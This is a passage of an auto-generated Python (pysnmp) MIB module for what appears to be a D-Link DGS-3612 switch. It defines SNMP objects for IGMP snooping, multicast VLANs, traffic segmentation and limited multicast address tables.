if mibBuilder.loadTexts: swL2IGMPInfoTable.setDescription('The table containing current IGMP information which captured by this device, provided that swL2DevCtrlIGMPSnooping and swL2IGMPCtrlState of associated VLAN entry are all enabled. Note that the priority of IGMP table entries is lower than Filtering Table, i.e. if there is a table hash collision between the entries of IGMP Table and Filtering Table inside the switch H/W address table, then Filtering Table entry overwrite the colliding entry of IGMP Table. See swL2FilterMgmt description also.')
swL2IGMPInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPVid"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPGroupIpAddr"))
if mibBuilder.loadTexts: swL2IGMPInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoEntry.setDescription('Information about current IGMP information which captured by this device, provided that swL2DevCtrlIGMPSnooping and swL2IGMPCtrlState of associated VLAN entry are all enabled.')
swL2IGMPVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPVid.setDescription('This object indicates the Vid of individual IGMP table entry. It shows the Vid of IGMP report information captured on network.')
swL2IGMPGroupIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPGroupIpAddr.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPGroupIpAddr.setDescription('This object is identify group ip address which is captured from IGMP packet, in per-Vlan basis.')
swL2IGMPMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMacAddr.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMacAddr.setDescription('This object is identify mac address which is corresponding to swL2IGMPGroupIpAddr, in per-Vlan basis.')
swL2IGMPPortMap = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPPortMap.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPPortMap.setDescription("This object indicates which ports are belong to the same multicast group, in per-Vlan basis. Each multicast group has a octect string to indicate with port map. The most significant bit represents the lowest numbered port, and the least significant bit represents the highest numbered port. Thus, each port of the switch is represented by a single bit within the value of this object. If that bit has a value of '1' then that port is included in the set of ports; the port is not included if its bit has a value of '0'(Note that the setting of the bit corresponding to the port from which a frame is received is irrelevant). The 4 octets is represent one unit port according its logic port. If the unit less 32 port, the other port don't care just fill zero.")
swL2IGMPIpGroupReportCount = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPIpGroupReportCount.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPIpGroupReportCount.setDescription('This object indicate how much report packet was receive by our device corresponding with this entry from IGMP function enabled, in per-Vlan basis.')
swL2IGMPRouterPortsTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6), )
if mibBuilder.loadTexts: swL2IGMPRouterPortsTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterPortsTable.setDescription("The table controls the Vlan's IGMP router ports function.")
swL2IGMPRouterPortsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPRouterPortsVid"))
if mibBuilder.loadTexts: swL2IGMPRouterPortsEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterPortsEntry.setDescription('The entry in IGMP router ports table (swL2IGMPRouterPortsTable).')
swL2IGMPRouterPortsVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPRouterPortsVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterPortsVid.setDescription("This object indicates the IGMP router ports entry's VLAN id. If VLAN is disabled, the Vid is always 0 and cannot be changed by management users. If VLAN is in Port-Base mode, the Vid is arranged from 1 to 12, fixed form. If VLAN is in 802.1q mode, the Vid setting can vary from 1 to 4094 by management user, and the Vid in each entry must be unique in the IGMP ports Table.")
swL2IGMPRouterStaticPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 2), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRouterStaticPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterStaticPortList.setDescription('')
swL2IGMPRouterDynamicPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 3), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPRouterDynamicPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterDynamicPortList.setDescription('')
swL2IGMPRouterForbiddenPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 4), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRouterForbiddenPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterForbiddenPortList.setDescription('')
swL2IGMPMulticastVlanTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7), )
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTable.setDescription('The information of the IGMP snooping multicast vlan table.')
swL2IGMPMulticastVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPMulticastVlanid"))
if mibBuilder.loadTexts: swL2IGMPMulticastVlanEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanEntry.setDescription('The entry of swL2IGMPMulticastVlanTable.')
swL2IGMPMulticastVlanid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanid.setDescription('This object indicates the vlan id of the IGMP snooping multicast vlan entry.')
swL2IGMPMulticastVlanName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanName.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanName.setDescription('This object indicates the vlan name of the IGMP snooping multicast vlan entry.')
swL2IGMPMulticastVlanSourcePort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 3), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanSourcePort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanSourcePort.setDescription('This object indicate the portlist of the source ports of IGMP snooping multicast vlan. The source ports will be set as tag ports of the vlan entry. And the IGMP control messages received from the member ports would be forwarded to the source ports. ')
swL2IGMPMulticastVlanMemberPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 4), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanMemberPort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanMemberPort.setDescription('This object indicate the portlist of the member ports of IGMP snooping multicast vlan. The source ports will be set as untag ports of the vlan entry. And the IGMP control messages received from the member ports would be forwarded to the source ports. ')
swL2IGMPMulticastVlanReplaceSourceIP = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 5), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplaceSourceIP.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplaceSourceIP.setDescription('The replace source IP of this multicast vlan.')
swL2IGMPMulticastVlanRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeName.setDescription('The name of multicast address range. When read, it shows NULL.')
swL2IGMPMulticastVlanRangeState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("none", 1), ("add", 2), ("delete", 3), ("deleteAll", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeState.setDescription(' This object is uesed to add or delete the specified multicast address range. when read it shows none(1); when set add(2) or delete(3),the swL2IGMPMulticastVlanRangeName should not be NULL. When set deleteAll(4), means delete all swL2IGMPMulticastVlanRangeName on this vlan.')
swL2IGMPMulticastVlanState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanState.setDescription(' This object can be enabled or disabled IGMP_snooping multicast VLAN.')
swL2IGMPMulticastVlanRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 9), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRowStatus.setDescription('This object indicates the status of this entry.')
swL2IGMPMulticastVlanUntagSourcePort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 10), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanUntagSourcePort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanUntagSourcePort.setDescription('This object indicates the untagged member ports to add to the multicast VLAN.')
swL2IGMPMulticastVlanRemapPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8)).clone(8)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRemapPriority.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRemapPriority.setDescription("The priority value (0 to 7) to be associated with the data traffic to be forwarded on the multicast VLAN. When set to 8, the packet's original priority will be used.")
swL2IGMPMulticastVlanReplacePriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("true", 1), ("false", 2)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplacePriority.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplacePriority.setDescription("Specifies that a packet's priority will be changed by the switch based on the remap priority. This flag will only take effect when remap priority is set.")
swL2IGMPMulticastVlanTagMemberPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 13), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTagMemberPort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTagMemberPort.setDescription('This object indicates the port list of the tag member ports of the IGMP snooping multicast VLAN.')
swL2IGMPForwardingTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8), )
if mibBuilder.loadTexts: swL2IGMPForwardingTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingTable.setDescription('The table containing current IGMP forwarding information which captured by this device, provided that swL2DevCtrlIGMPSnooping and swL2IGMPCtrlState of associated VLAN entry are all enabled. Note that the priority of IGMP table entries is lower than Filtering Table, i.e. if there is a table hash collision between the entries of IGMP Table and Filtering Table inside the switch H/W address table, then Filtering Table entry overwrite the colliding entry of IGMP Table. See swL2FilterMgmt description also.')
swL2IGMPForwardingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPForwardingVid"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPForwardingSrcIp"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPForwardingGroupAddr"))
if mibBuilder.loadTexts: swL2IGMPForwardingEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingEntry.setDescription('Information about current IGMP forwarding information which captured by this device, provided that swL2DevCtrlIGMPSnooping and swL2IGMPCtrlState of associated VLAN entry are all enabled.')
swL2IGMPForwardingVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingVid.setDescription('This object indicates the Vid of individual IGMP table entry. It shows the Vid of IGMP report information captured on network.')
swL2IGMPForwardingSrcIp = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingSrcIp.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingSrcIp.setDescription('This object is identify source ip address.')
swL2IGMPForwardingGroupAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingGroupAddr.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingGroupAddr.setDescription('This object is identify group ip address.')
swL2IGMPForwardingPortMember = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingPortMember.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingPortMember.setDescription('This object indicates which ports are belong to the same multicast group, in per-Vlan basis.')
swL2IGMPMulticastVlanGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9), )
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTable.setDescription('The table containing the IGMP snooping multicast VLAN group information')
swL2IGMPMulticastVlanGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPMulticastVlanGroupVid"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPMulticastVlanGroupRangeName"))
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupEntry.setDescription('Information about current IGMP snooping multicast VLAN group.')
swL2IGMPMulticastVlanGroupVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupVid.setDescription('This object indicates the Vid of IGMP snooping multicast VLAN group.')
swL2IGMPMulticastVlanGroupRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupRangeName.setDescription('The name of multicast address range.')
swL2IGMPMulticastVlanGroupHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupHead.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupHead.setDescription('The head of multicast address range.')
swL2IGMPMulticastVlanGroupTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTail.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTail.setDescription('The tail of multicast address range.')
swIGMPSnoopingGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11), )
if mibBuilder.loadTexts: swIGMPSnoopingGroupTable.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupTable.setDescription('The table contains the current IGMP snooping group information captured by the device.')
swIGMPSnoopingGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swIGMPSnoopingGroupVid"), (0, "DGS3612-L2MGMT-MIB", "swIGMPSnoopingGroupGroupAddr"), (0, "DGS3612-L2MGMT-MIB", "swIGMPSnoopingGroupSourceAddr"))
if mibBuilder.loadTexts: swIGMPSnoopingGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupEntry.setDescription('Information about the current IGMP snooping group information which has been captured by the device.')
swIGMPSnoopingGroupVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupVid.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupVid.setDescription('This object indicates the VID of the individual IGMP snooping group table entry.')
swIGMPSnoopingGroupGroupAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupGroupAddr.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupGroupAddr.setDescription('This object identifies the group IP address which have been captured from the IGMP packet, on a per-VLAN basis.')
swIGMPSnoopingGroupSourceAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupSourceAddr.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupSourceAddr.setDescription('This object identifies the source addresses.')
swIGMPSnoopingGroupIncludePortMap = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupIncludePortMap.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupIncludePortMap.setDescription('This object indicates the port list under INCLUDE mode.')
swIGMPSnoopingGroupExcludePortMap = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 5), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupExcludePortMap.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupExcludePortMap.setDescription('This object indicates the port list under EXCLUDE mode.')
swL2IGMPSnoopingStaticGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16), )
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupTable.setDescription('The table contains the current IGMP snooping static group information captured by the device.')
swL2IGMPSnoopingStaticGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPSnoopingStaticGroupVID"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPSnoopingStaticGroupIPaddress"))
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupEntry.setDescription('Information about current IGMP snooping static group information captured by the device.')
swL2IGMPSnoopingStaticGroupVID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupVID.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupVID.setDescription('This object indicates the VID of the current IGMP snooping static group.')
swL2IGMPSnoopingStaticGroupIPaddress = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupIPaddress.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupIPaddress.setDescription('This object indicates the current IGMP snooping static group IP address. ')
swL2IGMPSnoopingStaticGroupMemberPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 3), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupMemberPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupMemberPortList.setDescription('This object indicates the current IGMP snooping static group Member Portlist. ')
swL2IGMPSnoopingStaticGroupRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupRowStatus.setDescription('This object indicates the status of this entry.')
swL2TrafficSegTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1), )
if mibBuilder.loadTexts: swL2TrafficSegTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegTable.setDescription('This table specifys the port just can forward traffic to the specific port list.')
swL2TrafficSegEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrafficSegPort"))
if mibBuilder.loadTexts: swL2TrafficSegEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegEntry.setDescription('A list of information specifies the port with its traffic forward list.')
swL2TrafficSegPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrafficSegPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegPort.setDescription('The port number of the logical port.')
swL2TrafficSegForwardPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1, 1, 2), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrafficSegForwardPorts.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegForwardPorts.setDescription('The port list that the specific port can forward traffic.')
swL2IpLimitedMulticastTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1), )
if mibBuilder.loadTexts: swL2IpLimitedMulticastTable.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastTable.setDescription("This entity's per-port Limited IP multicast address range table.")
swL2IpLimitedMulticastEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IpLimitedMulticastPortIndex"))
if mibBuilder.loadTexts: swL2IpLimitedMulticastEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastEntry.setDescription("A particular route to a particular destination, under a particular policy. Once an entry be built,it shouldn't be modified.That is,it just support create and delete action.")
swL2IpLimitedMulticastPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IpLimitedMulticastPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastPortIndex.setDescription('A port to config the limited multicast address.')
swL2IpLimitedMulticastHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 2), IpAddress())
if mibBuilder.loadTexts: swL2IpLimitedMulticastHead.setStatus('obsolete')
if mibBuilder.loadTexts: swL2IpLimitedMulticastHead.setDescription('The head of multicast address range.')
swL2IpLimitedMulticastTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 3), IpAddress())
if mibBuilder.loadTexts: swL2IpLimitedMulticastTail.setStatus('obsolete')
if mibBuilder.loadTexts: swL2IpLimitedMulticastTail.setDescription('The tail of multicast address range.')
swL2IpLimitedMulticastAccess = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("none", 0), ("permit", 1), ("deny", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastAccess.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastAccess.setDescription('It allow you to permit or deny multicast range.')
swL2IpLimitedMulticastState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastState.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastState.setDescription('Enable or disable limited multicast address for the chosen port.')
swL2IpLimitedMulticastDelState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("invalid", 2))))
if mibBuilder.loadTexts: swL2IpLimitedMulticastDelState.setStatus('obsolete')
if mibBuilder.loadTexts: swL2IpLimitedMulticastDelState.setDescription('Enable or disable delete limited multicast address for the chosen port.')
swL2IpLimitedMulticastRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeName.setDescription('The name of multicast address range. When read, it shows NULL.')
swL2IpLimitedMulticastRangeNameState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("add", 2), ("delete", 3), ("deleteAll", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeNameState.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeNameState.setDescription('Add or delete the specified multicast address range. When read, it shows other(1); When set add(2) or delete(3), the swL2IpLimitedMulticastRangeName should be set also, and it should not be NULL. When set deleteAll(4), means delete all swL2IpLimitedMulticastRangeName on this port. And the set multicast range name value could be gotten in swL2LimitedMulticastAddressTable.')
swL2LimitedMulticastAddressTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2), )
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTable.setStatus('current')
